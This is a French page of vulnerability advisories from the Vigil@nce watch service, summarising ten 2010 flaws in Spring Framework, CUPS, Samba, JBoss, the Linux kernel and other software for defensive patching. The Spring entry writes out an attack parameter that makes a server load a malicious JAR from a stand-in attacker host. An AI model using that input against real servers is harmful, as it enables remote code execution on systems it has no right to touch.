L'équipe Vigil@nce veille les vulnérabilités publiques qui affectent votre parc informatique, puis propose des correctifs sécurité, une base et des outils pour y remédier.
Historique des vulnérabilités traitées par Vigil@nce :

annonce de vulnérabilité informatique CVE-2010-1622

Spring Framework : exécution de code

Synthèse de la vulnérabilité

Un attaquant peut employer une url illicite, afin de forcer le Spring Framework à charger un fichier JAR contenant du code à exécuter.
Produits concernés : RHEL.
Gravité : 3/4.
Conséquences : accès/droits privilégié.
Provenance : serveur internet.
Confiance : confirmé par l'éditeur (5/5).
Date création : 21/06/2010.
Références : BID-40954, CERTA-2010-AVI-387, CVE-2010-1622, RHSA-2011:0175-01, VIGILANCE-VUL-9717.

Description de la vulnérabilité

Une page JSP contient du code Java dans les blocs "<%...%>". Ce code peut être placé dans le fichier de tag "META-INF/tags/MonTag.tag" qui est ensuite appelé via "<prefixe:MonTag/>". Ces fichiers tags peuvent être placés dans une archive JAR, qui contient alors un fichier "META-INF/MonTLD.tld" (Tag Library Descriptor) qui indique tous les tags disponibles.

La variable "class.classLoader.URLs[0]" indique le premier chargeur de classes à utiliser. Spring Framework permet à un attaquant de définir cette variable. Cependant, cette variable est ensuite utilisée par org.apache.jasper.compiler.TldLocationsCache.scanJars() qui charge le TLD d'un JAR.

Un attaquant peut donc (simplifié) :
 - créer une archive JAR contenant un fichier de tag avec du code Java illicite, et "META-INF/spring-form.tld" pour modifier les tags des formulaires
 - placer cette archive sur http://attaquant/illicite.jar
 - se connecter sur Spring Framework, et ajouter le paramètre suivant dans l'url d'un formulaire : class.classLoader.URLs[0]=http://attaquant/illicite.jar
La méthode scanJars() chargera alors illicite.jar, et exécutera le code.

Un attaquant peut donc employer une url illicite, afin de forcer le Spring Framework à charger un fichier JAR contenant du code à exécuter.
Bulletin Vigil@nce complet.... (Essai gratuit)

alerte de vulnérabilité informatique CVE-2010-0302 CVE-2010-0540 CVE-2010-0542

CUPS : multiples vulnérabilités

Synthèse de la vulnérabilité

Plusieurs vulnérabilités de CUPS permettent à un attaquant de mener un déni de service, d'obtenir des informations, ou de faire exécuter du code.
Produits concernés : CUPS, Debian, Fedora, Mandriva Corporate, MES, Mandriva Linux, OpenSolaris, openSUSE, RHEL, Slackware, SUSE Linux Enterprise Desktop, SLES.
Gravité : 3/4.
Conséquences : accès/droits privilégié, accès/droits utilisateur, lecture de données, création/modification de données, déni de service du service.
Provenance : client intranet.
Confiance : confirmé par l'éditeur (5/5).
Date création : 18/06/2010.
Date révision : 25/06/2010.
Références : BID-40943, BID-41126, BID-41131, CERTA-2010-AVI-265, CERTA-2010-AVI-275, CVE-2010-0302, CVE-2010-0540, CVE-2010-0542, CVE-2010-1748, CVE-2010-2431, CVE-2010-2432, DSA-2176-1, FEDORA-2010-10066, FEDORA-2010-10101, FEDORA-2010-10388, MDVSA-2010:232, MDVSA-2010:233, MDVSA-2010:234, MDVSA-2011:146, openSUSE-SU-2010:1018-1, openSUSE-SU-2010:1053-1, RHSA-2010:0490-01, RHSA-2010:0811-01, SSA:2010-176-05, STR #3480, STR #3490, STR #3510, STR #3516, STR #3518, STR #3577, SUSE-SR:2010:023, SUSE-SU-2011:1136-1, SUSE-SU-2011:1136-2, SUSE-SU-2011:1141-1, SUSE-SU-2011:1149-1, VIGILANCE-VUL-9716.

Description de la vulnérabilité

Le système CUPS (Common UNIX Printing System) assure une gestion simplifiée des imprimantes sous un environnement Unix. Il comporte plusieurs vulnérabilités.

Un attaquant peut imprimer un document texte illicite, afin de provoquer une erreur d'allocation dans la fonction _WriteProlog() de texttops, conduisant à un déni de service ou à l'exécution de code. [grav:3/4; BID-40943, CVE-2010-0542, STR #3516]

Un attaquant distant peut demander la liste des travaux d'impression en cours afin mener un déni de service du démon CUPS. [grav:2/4; CVE-2010-0302, STR #3490]

La fonction cgi_initialize_string() du fichier cgi-bin/var.c n'initialise pas correctement la mémoire. Un attaquant peut employer une url "/admin", afin d'obtenir un fragment de la mémoire du système. [grav:2/4; CVE-2010-1748, STR #3577]

Un attaquant peut employer une vulnérabilité externe pour remplacer /var/cache/cups/remote.cache par un lien symbolique, afin de forcer CUPS à écraser le fichier pointé avec les privilèges root. [grav:1/4; BID-41131, CVE-2010-2431, STR #3510]

Un attaquant peut provoquer un Cross Site Request Forgery dans l'interface d'administration. [grav:3/4; CERTA-2010-AVI-265, CERTA-2010-AVI-275, CVE-2010-0540, STR #3480]

Lorsque CUPS est compilé avec HAVE_GSSAPI, un attaquant peut provoquer une boucle infinie dans la fonction cupsDoAuthentication(). [grav:1/4; BID-41126, CVE-2010-2432, STR #3518]

Ces vulnérabilités permettent à un attaquant de mener un déni de service, d'obtenir des informations, ou de faire exécuter du code.
Bulletin Vigil@nce complet.... (Essai gratuit)

vulnérabilité informatique 9715

Novell Netware : buffer overflow de CIFS.NLM

Synthèse de la vulnérabilité

Un attaquant peut provoquer un buffer overflow dans le service CIFS de Netware, afin de mener un déni de service, et éventuellement de faire exécuter du code.
Produits concernés : Netware.
Gravité : 3/4.
Conséquences : accès/droits utilisateur, déni de service du service.
Provenance : client intranet.
Confiance : confirmé par l'éditeur (5/5).
Date création : 17/06/2010.
Références : 5076512, BID-40908, SS-2010-006, VIGILANCE-VUL-9715.

Description de la vulnérabilité

Le module CIFS.NLM implémente le service CIFS/SMB pour Novell Netware.

Le message Session Setup AndX est utilisé pour envoyer le login (AccountName) et le mot de passe au serveur CIFS. Cependant, CIFS.NLM ne vérifie pas la taille du champ AccountName, ce qui provoque un buffer overflow.

Un attaquant peut donc provoquer un buffer overflow dans le service CIFS de Netware, afin de mener un déni de service, et éventuellement de faire exécuter du code.
Bulletin Vigil@nce complet.... (Essai gratuit)

avis de vulnérabilité CVE-2010-2226

Noyau Linux : lecture de fichier sur XFS

Synthèse de la vulnérabilité

Sur un système de fichiers XFS, lorsqu'un fichier est en mode write-only, un attaquant local peut employer l'ioctl SWAPEXT, afin de lire le fichier.
Produits concernés : Debian, Fedora, Linux, MES, Mandriva Linux, openSUSE, RHEL, SLES, ESX, ESXi, vCenter Server, VirtualCenter, VMware vSphere, VMware vSphere Hypervisor.
Gravité : 1/4.
Conséquences : lecture de données.
Provenance : shell utilisateur.
Confiance : confirmé par l'éditeur (5/5).
Date création : 17/06/2010.
Références : BID-40920, CVE-2010-2226, DSA-2094-1, FEDORA-2010-13110, MDVSA-2010:188, MDVSA-2010:198, openSUSE-SU-2010:0664-1, RHSA-2010:0610-01, SUSE-SA:2010:046, SUSE-SA:2010:060, SUSE-SA:2011:007, SUSE-SU-2011:0928-1, VIGILANCE-VUL-9714, VMSA-2011-0003, VMSA-2011-0003.1, VMSA-2011-0003.2.

Description de la vulnérabilité

Le noyau Linux supporte le système de fichiers XFS (IRIX).

Le champ de bits file.f_mode indique le mode d'un fichier :
 - FMODE_READ : ouvert en lecture
 - FMODE_WRITE : ouvert en écriture
 - etc.

L'ioctl SWAPEXT appelle la fonction xfs_swapext() du fichier fs/xfs/xfs_dfrag.c, qui copie les données et les attributs étendus d'un fichier vers un fichier temporaire. Cependant, cette fonction ne vérifie pas si le fichier source est lisible (FMODE_READ) avant de le copier dans un fichier de l'attaquant.

Sur un système de fichiers XFS, lorsqu'un fichier est en mode write-only, un attaquant local peut donc employer l'ioctl SWAPEXT, afin de lire le fichier.
Bulletin Vigil@nce complet.... (Essai gratuit)

bulletin de vulnérabilité 9713

SAP NetWeaver : vulnérabilité de SAP J2EE Telnet

Synthèse de la vulnérabilité

Un attaquant peut rejouer les données d'authentification de l'administration Telnet de SAP J2EE.
Produits concernés : SAP ERP, NetWeaver.
Gravité : 2/4.
Conséquences : accès/droits privilégié, accès/droits utilisateur.
Provenance : client intranet.
Confiance : confirmé par l'éditeur (5/5).
Date création : 17/06/2010.
Références : 1425847, BID-40916, Onapsis Security Advisory 2010-005, VIGILANCE-VUL-9713.

Description de la vulnérabilité

La Telnet Administration Console permet de gérer J2EE Engine en ligne de commande.

Un attaquant peut rejouer une session d'authentification Telnet.

Un attaquant peut alors obtenir un accès d'administration de SAP J2EE.
Bulletin Vigil@nce complet.... (Essai gratuit)

annonce de vulnérabilité CVE-2010-2063

Samba : buffer overflow de chain_reply

Synthèse de la vulnérabilité

Un attaquant non authentifié peut envoyer une requête SMB illicite, afin de provoquer un buffer overflow dans Samba, conduisant à un déni de service ou à l'exécution de code.
Produits concernés : Debian, HP-UX, Mandriva Corporate, MES, Mandriva Linux, NLD, OES, OpenSolaris, openSUSE, Solaris, RHEL, Samba, Slackware, SLES, ESX.
Gravité : 3/4.
Conséquences : accès/droits privilégié, accès/droits utilisateur, déni de service du service.
Provenance : client intranet.
Confiance : confirmé par l'éditeur (5/5).
Date création : 16/06/2010.
Références : BID-40884, c02627925, c02787667, CERTA-2002-AVI-268, CERTA-2010-AVI-266, CERTA-2011-AVI-174, CVE-2010-2063, DSA-2061-1, HPSBUX02609, HPSBUX02657, MDVSA-2010:119, RHSA-2010:0488-01, SSA:2010-169-01, SSRT100147, SSRT100460, SUSE-SA:2010:025, SUSE-SR:2010:014, VIGILANCE-VUL-9712, VMSA-2010-0013, VMSA-2010-0013.1, VMSA-2010-0013.2, VMSA-2010-0013.3.

Description de la vulnérabilité

Le protocole SMB permet de fragmenter les messages trop longs dans plusieurs paquets ("chained packets").

La fonction chain_reply() du fichier source/smbd/process.c gère ces séquences de paquets. Cependant, si un paquet indique un offset invalide, un buffer overflow se produit.

Un attaquant non authentifié peut donc envoyer une requête SMB illicite, afin de provoquer un buffer overflow dans Samba, conduisant à un déni de service ou à l'exécution de code.
Bulletin Vigil@nce complet.... (Essai gratuit)

alerte de vulnérabilité 9711

JBoss AS : Cross Site Request Forgery de JMX Console

Synthèse de la vulnérabilité

Lorsque l'administrateur est connecté sur la JMX Console de JBoss AS, un attaquant peut l'inviter à consulter une page web, afin d'automatiquement déployer un fichier WAR via le MBean DeploymentFileRepository.
Produits concernés : JBoss AS OpenSource, JBoss EAP par Red Hat.
Gravité : 2/4.
Conséquences : création/modification de données.
Provenance : document.
Confiance : confirmé par l'éditeur (5/5).
Date création : 16/06/2010.
Références : VIGILANCE-VUL-9711.

Description de la vulnérabilité

La JMX Console de JBoss Application Server est utilisée pour administrer le site.

Le MBean DeploymentFileRepository permet de facilement déployer une application WAR sur le site.

La page http://serveur:8080/jmxconsole/HtmlAdaptor permet d'appeler directement DeploymentFileRepository, sans confirmation, pour déployer une application illicite.

Lorsque l'administrateur est connecté sur la JMX Console de JBoss AS, un attaquant peut donc l'inviter à consulter une page web contenant une image vers HtmlAdaptor, afin d'automatiquement déployer un fichier WAR via le MBean DeploymentFileRepository.
Bulletin Vigil@nce complet.... (Essai gratuit)

vulnérabilité CVE-2009-4895

Noyau Linux : déni de service de tty_fasync

Synthèse de la vulnérabilité

Un attaquant local peut provoquer un inter-blocage dans tty_fasync(), afin de stopper le système.
Produits concernés : Debian, Linux.
Gravité : 1/4.
Conséquences : déni de service du serveur.
Provenance : shell utilisateur.
Confiance : confirmé par l'éditeur (5/5).
Date création : 15/06/2010.
Références : BID-40867, CVE-2009-4895, DSA-2094-1, VIGILANCE-VUL-9710.

Description de la vulnérabilité

La fonction f_modown() du fichier fs/fcntl.c modifie le propriétaire d'un fichier.

La fonction tty_fasync() du fichier drivers/char/tty_io.c gère les accès asynchrones à un TTY. Elle emploie __f_setown() pour modifier le propriétaire d'un fichier.

Cependant, lorsque ces fonctions sont appelées simultanément, deux verrous sont utilisés, et un inter-blocage se produit.

Un attaquant local peut donc provoquer un inter-blocage dans tty_fasync(), afin de stopper le système.
Bulletin Vigil@nce complet.... (Essai gratuit)

avis de vulnérabilité informatique CVE-2010-1932

XnView : buffer overflow via MBM

Synthèse de la vulnérabilité

Un attaquant peut inviter la victime à ouvrir un document MBM illicite avec XnView, afin de faire exécuter du code sur sa machine.
Produits concernés : XnView.
Gravité : 3/4.
Conséquences : accès/droits utilisateur, déni de service du client.
Provenance : document.
Confiance : confirmé par l'éditeur (5/5).
Date création : 15/06/2010.
Références : BID-40852, CORE-2010-0514, CVE-2010-1932, VIGILANCE-VUL-9709.

Description de la vulnérabilité

Le format de fichier MBM (Symbian/Psion MultiBitMap) permet stocker plusieurs images bitmap, qui peuvent être compressées au format RLE (Run Length Encoding).

Le décodeur RLE du programme d'affichage d'images XnView n'alloue pas suffisamment de mémoire pour stocker les données d'une image MBM. Un heap overflow se produit alors.

Un attaquant peut donc inviter la victime à ouvrir un document MBM illicite avec XnView, afin de faire exécuter du code sur sa machine.
Bulletin Vigil@nce complet.... (Essai gratuit)

bulletin de vulnérabilité informatique CVE-2010-2089

Python : buffer overflow de audioop

Synthèse de la vulnérabilité

Un attaquant peut provoquer plusieurs buffer overflows dans le module audioop de Python, afin de mener un déni de service ou de faire exécuter du code.
Produits concernés : Fedora, Mandriva Corporate, MES, Mandriva Linux, openSUSE, Python, RHEL, SLES, ESX, ESXi, VMware vSphere, VMware vSphere Hypervisor.
Gravité : 2/4.
Conséquences : accès/droits utilisateur, déni de service du client.
Provenance : document.
Confiance : confirmé par l'éditeur (5/5).
Date création : 15/06/2010.
Références : 598197, 7673, BID-40863, CVE-2010-2089, FEDORA-2010-13388, FEDORA-2010-9565, FEDORA-2010-9652, MDVSA-2010:132, openSUSE-SU-2010:1049-1, RHSA-2011:0027-01, RHSA-2011:0491-01, SUSE-SR:2010:024, SUSE-SR:2011:002, VIGILANCE-VUL-9708.

Description de la vulnérabilité

Le module audioop de Python permet de manipuler des enregistrements audio.

Plusieurs fonctions audioop_*() du fichier Modules/audioop.c ne vérifient pas la taille de leurs paramètres, ce qui provoque des lectures/écritures à une adresse mémoire invalide.

Un attaquant peut donc inviter la victime à ouvrir un fichier audio illicite, afin de mener un déni de service ou de faire exécuter du code, dans les applications utilisant Python audioop.
Bulletin Vigil@nce complet.... (Essai gratuit)

Page précédente   Page suivante

Accès à la page 1 21 41 61 81 101 121 141 161 181 201 221 241 261 281 301 321 341 361 381 401 421 441 461 481 501 521 541 561 581 601 621 641 661 681 701 721 741 761 781 801 821 841 861 881 901 921 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 961 981 1001 1021 1041 1061 1081 1101 1121 1141 1161 1181 1201 1221 1241 1261 1281 1301 1321 1341 1361 1381 1401 1421 1441 1461 1481 1501 1521 1541 1561 1581 1601 1621 1641 1661 1681 1701 1721 1741 1761 1781 1801 1821 1841 1861 1881 1901 1921 1941 1961 1981 2001 2021 2041 2061 2081 2101 2121 2141 2161 2181 2201 2221 2241 2261 2281 2301 2321 2341 2361 2381 2401 2421 2441 2461 2481 2501 2521 2541 2561 2581 2601 2621 2641 2661 2668